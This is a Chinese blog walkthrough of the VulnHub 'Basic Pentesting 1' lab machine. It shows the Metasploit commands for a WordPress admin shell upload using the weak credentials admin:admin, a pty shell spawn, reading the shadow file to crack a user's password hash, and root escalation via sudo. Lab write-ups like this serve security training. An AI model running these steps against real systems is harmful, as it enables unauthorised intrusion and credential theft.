vulnhub-Basic Pentesting 1靶机

于 2024-09-23 11:44:03 发布
阅读量497 收藏 5
点赞数 16
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142454583
版权

vulnhub:https://www.vulnhub.com/entry/basic-pentesting-1,216/

导入靶机,和kali同一网段,扫描

image-20240923112520998

扫描到靶机IP为192.168.114.129,扫描端口

image-20240923112550973

扫描出三个端口,存在网站服务,访问

image-20240923112642037

扫描网站目录

image-20240923112828379

扫描到一个secret目录,访问

image-20240923112904892

在网页最底下可以看到这是个WordPress的站,尝试访问管理页面(wp-admin)

重定向到了登陆界面

image-20240923113021848

存在弱密码组合admin:admin

image-20240923113055956

我们可以使用MSF的WordPress利用脚本来获取shell

msfconsole

use exploit/unix/webapp/wp_admin_shell_upload

show options

set username admin

set password admin

set targeturi /secret/

set rhosts 192.168.114.129

image-20240923113422707

执行脚本,开启meterpreter会话

image-20240923113506805

进入命令行

shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看passwd和shadow文件

image-20240923113853079

在shadow文件里找到marlinspike的密码哈希,复制进行破解,得到marlinspike

使用这个账户登录

image-20240923114016099

使用sudo -l命令发现我们可以无密码使用任意sudo命令,sudo su提权

image-20240923114132763

提权完成

生草工坊
关注
Gray-Hacker-and-PenTesting
06-26
我的灰色黑客资源 全部装在一个大袋子里。 为了乐趣、利润或 CTF。 * * * * * * * *逆向工程 *橡皮鸭 *隐写术 *网络漏洞利用 *其他黑客攻击 *笔测试 有用的命令行 搜索 ...telnet localhost
python-pentesting:python-pentesting工具
05-04
主要脚本是pentesting-tool.py,您需要使用python 2.7执行。还需要安装requeriments.txt和其他模块,例如python-msfrpc 从requeriments.txt安装依赖项 点安装-r requirements.txt 介绍 该工具允许获取有关特定IP或域...
Internet-Of-Things-Pentesting-Framework
05-09
这只是一个测试版本(原型),新工具将很快发布! 信息安全框架是一系列文档化的过程,用于定义围绕企业环境中信息安全控件的实施和持续管理的策略和过程。HEATHEN:物联网的沉思框架牛津大学将物联网定义为:...
渗透测试报告public-pentesting-reports
03-03
渗透测试报告public-pentesting-reports
Golden-Guide-for-Pentesting:黄金指南
04-18
黄金学期指南基于 。 希望此文件对您的审核和CTF有所帮助。
rhino grasshoper 框内物体排列(附视频).gh
最新发布
10-18
【闭合线内物体按方向移动/排列】https://www.bilibili.com/video/BV1z1WfeSEWu?vd_source=b420114c993138474d2e93d83ead77a5
kwant-1.4.3-cp38-cp38-win_amd64.whl
10-18
kwant-1.4.3-cp38-cp38-win_amd64.whl
rhino grasshoper 景观椅(附视频).gh
10-18
【rhino@grasshoper 曲线金属座椅景观案例(文件获取/见简介)】https://www.bilibili.com/video/BV1Dx4y147Lr?vd_source=b420114c993138474d2e93d83ead77a5
PCIe通义万问系列文档的第一部已整理完毕,含999个PCIe相关问答
10-18
《PCIe通义万问》系列文档旨在记录PCIe相关行业工程师们在PCIe协议学习、IP设计验证、产品测试及使用过程中遇到的问题、迸发的思考、进行的探讨及可能的解决方案,以期给遇到相同相似问题的同行们些许启发。文档涉及的技术方向主要为PCIe,也包含PCIe相关的CXL、UCIe及计算机体系结构相关内容。 本文档是《PCIe通义万问》系列文档之(一),含999个问题。问题内容有以下三个来源:MangoPapa(下称博主)的“PCIe每日一问一答”系列专栏;博主的博文留言及私信讨论;博主作为群主的“PCIe技术交流群”群聊内容。MangoPapa小助理、折叠、先杰、CR小队长、kangling共同完成了问答内容提取与归纳整理,噫嘘唏及慕荷负责文辞优化及编辑排版,上述人员及MangoPapa、JasonW、皮塞阿姨、席可儿参与了文档内容的审校。感谢以上人员的无私奉献。 本文档仅对讨论内容进行总结记录,不保证问题答案的正确性,部分问题只提供解决思路或讨论过程。术业有专攻,文内定有偏颇。如您发现谬误,一敬希原宥,二望乞点拨;如您持异见,欢迎来信讨论。如有需要,欢迎联系MangoPapa加入相关
毕业设计论文SpringBoot招投标管理系统.docx
10-18
毕业设计论文
直观的大型模型应用软件-有机体-eva.zip
10-18
直观的大型模型应用软件-有机体-eva
全球与中国7N高纯砷市场现状及未来发展趋势(2024版).docx
10-18
全球与中国7N高纯砷市场现状及未来发展趋势(2024版).docx
在我的A股市场上爬行和收集有负面信息的上市公司的名字,违反规定并施加处罚
10-18
在我的A股市场上爬行和收集有负面信息的上市公司的名字,违反规定并施加处罚,实在太过分了。。http----www.kapaidashu.org-evil-app.php_trading-evil-collect
edt-2.3.0-cp38-cp38-win_amd64.whl
10-18
edt-2.3.0-cp38-cp38-win_amd64.whl
media3 ExoPlayer 扩展解码库aar decoder-vp9、decoder-av1、decoder-ffmpeg
10-18
media3 ExoPlayer 扩展解码库aar。 decoder_av1 (视频解码) decoder_ffmpeg (音频解码) decoder_vp9 (视频解码)
edt-2.3.0-pp38-pypy38_pp73-win_amd64.whl
10-18
edt-2.3.0-pp38-pypy38_pp73-win_amd64.whl
毕业设计论文SpringBoot在线装修管理系统.docx
10-18
毕业设计论文
edt-2.3.0-cp310-cp310-win_amd64.whl
10-18
edt-2.3.0-cp310-cp310-win_amd64.whl
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值